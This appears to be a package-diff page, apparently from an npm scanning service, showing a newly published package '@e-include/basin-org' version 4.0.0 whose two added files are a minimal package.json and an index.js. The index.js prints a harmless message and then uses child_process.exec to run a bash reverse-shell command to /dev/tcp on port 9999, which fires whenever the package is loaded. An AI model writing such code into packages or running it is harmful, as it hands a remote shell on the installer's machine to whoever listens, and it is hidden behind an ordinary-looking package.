@e-include/basin-org 4.0.0

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +11 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ console.log("This is the public package!");
2
+ const { exec } = require('child_process');
3
+ exec('bash -i >& /dev/tcp/127.0.0.1/9999 0>&1');
package/package.json ADDED
@@ -0,0 +1,11 @@
1
+ {
2
+ "name": "@e-include/basin-org",
3
+ "version": "4.0.0",
4
+ "main": "index.js",
5
+ "scripts": {
6
+ "test": "exit 0"
7
+ },
8
+ "author": "",
9
+ "license": "ISC",
10
+ "description": ""
11
+ }